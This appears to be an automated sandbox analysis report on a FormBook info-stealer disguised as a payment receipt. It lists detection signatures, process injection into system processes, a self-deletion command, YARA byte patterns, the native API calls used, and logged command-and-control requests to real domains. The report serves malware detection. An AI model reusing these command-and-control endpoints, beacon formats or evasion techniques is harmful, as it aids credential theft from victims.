Analysis Report Final-Payment-Receipt.exe

Overview

General Information

Sample Name: Final-Payment-Receipt.exe
Analysis ID: 320833
MD5: 8f5d29001a9f5d4f62b47af6442be5ab
SHA1: 4838464ffe421aad7c9d73ba19420b7e9c2c427d
SHA256: 8e01fb320ffa60c0157bfc9aa8c6de43a7802d7f408de907a0d6338ce25c239c
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • Final-Payment-Receipt.exe (PID: 1692 cmdline: 'C:\Users\user\Desktop\Final-Payment-Receipt.exe' MD5: 8F5D29001A9F5D4F62B47AF6442BE5AB)
    • Final-Payment-Receipt.exe (PID: 5764 cmdline: C:\Users\user\Desktop\Final-Payment-Receipt.exe MD5: 8F5D29001A9F5D4F62B47AF6442BE5AB)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 4732 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 5932 cmdline: /c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.Final-Payment-Receipt.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.Final-Payment-Receipt.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a537:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b53a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.Final-Payment-Receipt.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x17619:$sqlite3step: 68 34 1C 7B E1
        • 0x1772c:$sqlite3step: 68 34 1C 7B E1
        • 0x17648:$sqlite3text: 68 38 2A 90 C5
        • 0x1776d:$sqlite3text: 68 38 2A 90 C5
        • 0x1765b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17783:$sqlite3blob: 68 53 D8 7F 8C
1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          AV Detection:

          Multi AV Scanner detection for submitted file
          Source: Final-Payment-Receipt.exe, ReversingLabs: Detection: 34%
          Yara detected FormBook
          Source: Yara match, File source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sample
          Source: Final-Payment-Receipt.exe, Joe Sandbox ML: detected
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_055EBFA0
          Source: global traffic, HTTP traffic detected: GET /71m/?Rzr0iD=xuMbXRqvcjTkPYem20N3vsgWyUob49TNzNry+QjPYNTyHJJexkEaphWMorU+NKluO0/a&ZL3=rVvxt090-21lhr HTTP/1.1 Host: www.wacrox.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /71m/?Rzr0iD=gir/TGf45q640hyvaYoOLmcQvbxfbyF+CK0IasCqTcsJdBCY+OvZ/ZhMnEHJcPXMDgdk&ZL3=rVvxt090-21lhr HTTP/1.1 Host: www.trumpingitagain.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr HTTP/1.1 Host: www.themindofafunnygirl.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View, ASN Name: DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU
          Source: Joe Sandbox View, ASN Name: AUTOMATTICUS
          Source: Joe Sandbox View, ASN Name: NAMECHEAP-NETUS
          Source: unknown, DNS traffic detected: queries for: g.msn.com
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 19 Nov 2020 21:20:27 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 327 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /71m/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: wlanext.exe, 00000003.00000002.492344982.00000000041AF000.00000004.00000001.sdmp, String found in binary or memory: https://themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ98

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sample, Static PE information: Filename: Final-Payment-Receipt.exe
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419D70 NtCreateFile,1_2_00419D70
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419E20 NtReadFile,1_2_00419E20
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419EA0 NtClose,1_2_00419EA0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419F50 NtAllocateVirtualMemory,1_2_00419F50
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419DC2 NtCreateFile,1_2_00419DC2
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419E1F NtReadFile,1_2_00419E1F
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419F4C NtAllocateVirtualMemory,1_2_00419F4C
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_013F9910
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F99A0 NtCreateSection,LdrInitializeThunk,1_2_013F99A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_013F9860
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9840 NtDelayExecution,LdrInitializeThunk,1_2_013F9840
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_013F98F0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A20 NtResumeThread,LdrInitializeThunk,1_2_013F9A20
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_013F9A00
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A50 NtCreateFile,LdrInitializeThunk,1_2_013F9A50
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9540 NtReadFile,LdrInitializeThunk,1_2_013F9540
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F95D0 NtClose,LdrInitializeThunk,1_2_013F95D0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9710 NtQueryInformationToken,LdrInitializeThunk,1_2_013F9710
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_013F97A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9780 NtMapViewOfSection,LdrInitializeThunk,1_2_013F9780
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_013F9660
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_013F96E0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9950 NtQueueApcThread,1_2_013F9950
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F99D0 NtCreateProcessEx,1_2_013F99D0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9820 NtEnumerateKey,1_2_013F9820
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FB040 NtSuspendThread,1_2_013FB040
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F98A0 NtWriteVirtualMemory,1_2_013F98A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9B00 NtSetValueKey,1_2_013F9B00
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FA3B0 NtGetContextThread,1_2_013FA3B0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A10 NtQuerySection,1_2_013F9A10
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A80 NtOpenDirectoryObject,1_2_013F9A80
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FAD30 NtSetContextThread,1_2_013FAD30
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9520 NtWaitForSingleObject,1_2_013F9520
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9560 NtWriteFile,1_2_013F9560
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F95F0 NtQueryInformationFile,1_2_013F95F0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9730 NtQueryVirtualMemory,1_2_013F9730
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FA710 NtOpenProcessToken,1_2_013FA710
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FA770 NtOpenThread,1_2_013FA770
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9770 NtSetInformationFile,1_2_013F9770
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9760 NtOpenProcess,1_2_013F9760
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9FE0 NtCreateMutant,1_2_013F9FE0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9610 NtEnumerateValueKey,1_2_013F9610
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9670 NtQueryInformationProcess,1_2_013F9670
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9650 NtQueryValueKey,1_2_013F9650
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F96D0 NtCreateKey,1_2_013F96D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759A50 NtCreateFile,LdrInitializeThunk,3_2_03759A50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_03759910
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037599A0 NtCreateSection,LdrInitializeThunk,3_2_037599A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759860 NtQuerySystemInformation,LdrInitializeThunk,3_2_03759860
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759840 NtDelayExecution,LdrInitializeThunk,3_2_03759840
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759710 NtQueryInformationToken,LdrInitializeThunk,3_2_03759710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759FE0 NtCreateMutant,LdrInitializeThunk,3_2_03759FE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759780 NtMapViewOfSection,LdrInitializeThunk,3_2_03759780
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_03759660
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759650 NtQueryValueKey,LdrInitializeThunk,3_2_03759650
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037596E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_037596E0
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037596D0 NtCreateKey,LdrInitializeThunk,3_2_037596D0
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759540 NtReadFile,LdrInitializeThunk,3_2_03759540
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037595D0 NtClose,LdrInitializeThunk,3_2_037595D0
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759B00 NtSetValueKey,3_2_03759B00
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0375A3B0 NtGetContextThread,3_2_0375A3B0
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759A20 NtResumeThread,3_2_03759A20
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759A10 NtQuerySection,3_2_03759A10
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759A00 NtProtectVirtualMemory,3_2_03759A00
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759A80 NtOpenDirectoryObject,3_2_03759A80
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759950 NtQueueApcThread,3_2_03759950
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037599D0 NtCreateProcessEx,3_2_037599D0
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0375B040 NtSuspendThread,3_2_0375B040
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759820 NtEnumerateKey,3_2_03759820
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037598F0 NtReadVirtualMemory,3_2_037598F0
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037598A0 NtWriteVirtualMemory,3_2_037598A0
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0375A770 NtOpenThread,3_2_0375A770
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759770 NtSetInformationFile,3_2_03759770
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759760 NtOpenProcess,3_2_03759760
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759730 NtQueryVirtualMemory,3_2_03759730
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0375A710 NtOpenProcessToken,3_2_0375A710
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037597A0 NtUnmapViewOfSection,3_2_037597A0
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759670 NtQueryInformationProcess,3_2_03759670
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759610 NtEnumerateValueKey,3_2_03759610
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759560 NtWriteFile,3_2_03759560
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0375AD30 NtSetContextThread,3_2_0375AD30
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759520 NtWaitForSingleObject,3_2_03759520
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037595F0 NtQueryInformationFile,3_2_037595F0
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02EC9EA0 NtClose,3_2_02EC9EA0
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02EC9E20 NtReadFile,3_2_02EC9E20
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02EC9F50 NtAllocateVirtualMemory,3_2_02EC9F50
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02EC9D70 NtCreateFile,3_2_02EC9D70
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02EC9E1F NtReadFile,3_2_02EC9E1F
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02EC9F4C NtAllocateVirtualMemory,3_2_02EC9F4C
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02EC9DC2 NtCreateFile,3_2_02EC9DC2
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: String function: 0371B150 appears 145 times
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: String function: 013BB150 appears 145 times
          Source: Final-Payment-Receipt.exe, 00000000.00000000.224938714.000000000009A000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameF5NI.exe4 vs Final-Payment-Receipt.exe
          Source: Final-Payment-Receipt.exe, 00000000.00000002.236173671.0000000005570000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameKedermister.dllT vs Final-Payment-Receipt.exe
          Source: Final-Payment-Receipt.exe, 00000001.00000002.263682500.000000000163F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Final-Payment-Receipt.exe
          Source: Final-Payment-Receipt.exe, 00000001.00000000.230648547.000000000095A000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameF5NI.exe4 vs Final-Payment-Receipt.exe
          Source: Final-Payment-Receipt.exe, 00000001.00000002.263300020.0000000001382000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamewlanext.exej% vs Final-Payment-Receipt.exe
          Source: Final-Payment-Receipt.exe Binary or memory string: OriginalFilenameF5NI.exe4 vs Final-Payment-Receipt.exe
          Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
